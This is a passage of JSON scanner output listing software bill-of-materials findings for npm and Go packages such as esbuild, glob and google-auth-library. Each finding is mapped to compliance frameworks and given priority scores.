"IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "701c2b7f153ed08a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/esbuild/bin/esbuild", "startLine": 0 }, "message": "Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2", "title": "github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2", "description": "Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0dc26b5347e8f4df", "name": "github.com/evanw/esbuild", "version": "v0.0.0-20240609211631-fc37c2fa9de2", "type": "go-module", "foundBy": "go-module-binary-cataloger", "locations": [ { "path": "/node_modules/esbuild/bin/esbuild", "accessPath": "/node_modules/esbuild/bin/esbuild", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "go", "cpes": [ { "cpe": "cpe:2.3:a:evanw:esbuild:v0.0.0-20240609211631-fc37c2fa9de2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:golang/github.com/evanw/esbuild@v0.0.0-20240609211631-fc37c2fa9de2", "metadataType": "go-module-buildinfo-entry", "metadata": { "goBuildSettings": [ { "key": "-buildmode", "value": "exe" }, { "key": "-compiler", "value": "gc" }, { "key": "-trimpath", "value": "true" }, { "key": "CGO_ENABLED", "value": "0" }, { "key": "GOARCH", "value": "arm64" }, { "key": "GOOS", "value": "darwin" }, { "key": "vcs", "value": "git" }, { "key": "vcs.revision", "value": "fc37c2fa9de2ad77476a6d4a8f1516196b90187e" }, { "key": "vcs.time", "value": "2024-06-09T21:16:31Z" }, { "key": "vcs.modified", "value": "false" } ], "goCompiledVersion": "go1.20.12", "architecture": "arm64", "mainModule": "github.com/evanw/esbuild", "goCryptoSettings": [ "standard-crypto" ] } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0bd7d35ef088b0fd", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: glob 10.5.0", "title": "glob 10.5.0", "description": "Package discovered: glob 10.5.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "8da722cb9983d6b3", "name": "glob", "version": "10.5.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:isaacs:glob:10.5.0:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/glob@10.5.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/glob/-/glob-10.5.0.tgz", "integrity": "sha512-DfXN8DfhJ7NH3Oe7cFmu3NCu1wKbkReJ8TorzSAFbSKrlNaQSKfIzqYqVY8zlbs2NLBbWpRiU52GX2PbaBVNkg==", "dependencies": { "foreground-child": "^3.1.0", "jackspeak": "^3.1.2", "minimatch": "^9.0.4", "minipass": "^7.1.2", "package-json-from-dist": "^1.0.0", "path-scurry": "^1.11.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "282a3bcad6a151e3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: glob-parent 5.1.2", "title": "glob-parent 5.1.2", "description": "Package discovered: glob-parent 5.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e9e84f484cfaf367", "name": "glob-parent", "version": "5.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:gulpjs:glob-parent:5.1.2:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/glob-parent@5.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz", "integrity": "sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==", "dependencies": { "is-glob": "^4.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4709c0ff6455a8d2", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: glob-parent 6.0.2", "title": "glob-parent 6.0.2", "description": "Package discovered: glob-parent 6.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "1644b4942c7696f6", "name": "glob-parent", "version": "6.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:gulpjs:glob-parent:6.0.2:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/glob-parent@6.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz", "integrity": "sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==", "dependencies": { "is-glob": "^4.0.3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0dbbd23e15d1e62b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", "startLine": 0 }, "message": "Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8", "title": "golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8", "description": "Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7890a665ce9e5849", "name": "golang.org/x/sys", "version": "v0.0.0-20220715151400-c0bba94af5f8", "type": "go-module", "foundBy": "go-module-binary-cataloger", "locations": [ { "path": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", "accessPath": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "go", "cpes": [ { "cpe": "cpe:2.3:a:golang:x\\/sys:v0.0.0-20220715151400-c0bba94af5f8:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:golang/golang.org/x/sys@v0.0.0-20220715151400-c0bba94af5f8", "metadataType": "go-module-buildinfo-entry", "metadata": { "goCompiledVersion": "go1.20.12", "architecture": "arm64", "h1Digest": "h1:0A+M6Uqn+Eje4kHMK80dtF3JCXC4ykBgQG4Fe06QRhQ=", "mainModule": "github.com/evanw/esbuild", "goCryptoSettings": [ "standard-crypto" ] } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "5c6e328f37ad400d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/esbuild/bin/esbuild", "startLine": 0 }, "message": "Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8", "title": "golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8", "description": "Package discovered: golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "839067488ff020a0", "name": "golang.org/x/sys", "version": "v0.0.0-20220715151400-c0bba94af5f8", "type": "go-module", "foundBy": "go-module-binary-cataloger", "locations": [ { "path": "/node_modules/esbuild/bin/esbuild", "accessPath": "/node_modules/esbuild/bin/esbuild", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "go", "cpes": [ { "cpe": "cpe:2.3:a:golang:x\\/sys:v0.0.0-20220715151400-c0bba94af5f8:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:golang/golang.org/x/sys@v0.0.0-20220715151400-c0bba94af5f8", "metadataType": "go-module-buildinfo-entry", "metadata": { "goCompiledVersion": "go1.20.12", "architecture": "arm64", "h1Digest": "h1:0A+M6Uqn+Eje4kHMK80dtF3JCXC4ykBgQG4Fe06QRhQ=", "mainModule": "github.com/evanw/esbuild", "goCryptoSettings": [ "standard-crypto" ] } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "59d2bd18fdd1d561", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: google-auth-library 9.15.1", "title": "google-auth-library 9.15.1", "description": "Package discovered: google-auth-library 9.15.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "4fb04863a4dacd73", "name": "google-auth-library", "version": "9.15.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:google-auth-library:google-auth-library:9.15.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google-auth-library:google_auth_library:9.15.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google_auth_library:google-auth-library:9.15.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google_auth_library:google_auth_library:9.15.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google-auth:google-auth-library:9.15.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google-auth:google_auth_library:9.15.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google_auth:google-auth-library:9.15.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google_auth:google_auth_library:9.15.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google:google-auth-library:9.15.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google:google_auth_library:9.15.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/google-auth-library@9.15.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/google-auth-library/-/google-auth-library-9.15.1.tgz", "integrity": "sha512-Jb6Z0+nvECVz+2lzSMt9u98UsoakXxA2HGHMCxh+so3n90XgYWkq5dur19JAJV7ONiJY22yBTyJB1TSkvPq9Ng==", "dependencies": { "base64-js": "^1.3.0", "ecdsa-sig-formatter": "^1.0.11", "gaxios": "^6.1.1", "gcp-metadata": "^6.1.0", "gtoken": "^7.0.0", "jws": "^4.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f744ca691ff58390", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: google-gax 4.6.1", "title": "google-gax 4.6.1", "description": "Package discovered: google-gax 4.6.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3344aade71052029", "name": "google-gax", "version": "4.6.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:google-gax:google-gax:4.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google-gax:google_gax:4.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google_gax:google-gax:4.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google_gax:google_gax:4.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google:google-gax:4.6.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google:google_gax:4.6.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/google-gax@4.6.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/google-gax/-/google-gax-4.6.1.tgz", "integrity": "sha512-V6eky/xz2mcKfAd1Ioxyd6nmA61gao3n01C+YeuIwu3vzM9EDR6wcVzMSIbLMDXWeoi9SHYctXuKYC5uJUT3eQ==", "dependencies": { "@grpc/grpc-js": "^1.10.9", "@grpc/proto-loader": "^0.7.13", "@types/long": "^4.0.0", "abort-controller": "^3.0.0", "duplexify": "^4.0.0", "google-auth-library": "^9.3.0", "node-fetch": "^2.7.0", "object-hash": "^3.0.0", "proto3-json-serializer": "^2.0.2", "protobufjs": "^7.3.2", "retry-request": "^7.0.0", "uuid": "^9.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "38ca80e4adb1c1ba", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: google-logging-utils 0.0.2", "title": "google-logging-utils 0.0.2", "description": "Package discovered: google-logging-utils 0.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c45a9f7f7c5a1d26", "name": "google-logging-utils", "version": "0.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:google-logging-utils:google-logging-utils:0.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google-logging-utils:google_logging_utils:0.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google_logging_utils:google-logging-utils:0.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google_logging_utils:google_logging_utils:0.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google-logging:google-logging-utils:0.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google-logging:google_logging_utils:0.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google_logging:google-logging-utils:0.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google_logging:google_logging_utils:0.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google:google-logging-utils:0.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:google:google_logging_utils:0.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/google-logging-utils@0.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/google-logging-utils/-/google-logging-utils-0.0.2.tgz", "integrity": "sha512-NEgUnEcBiP5HrPzufUkBzJOD/Sxsco3rLNo1F1TNf7ieU8ryUzBhqba8r756CjLX7rn3fHl6iLEwPYuqpoKgQQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" 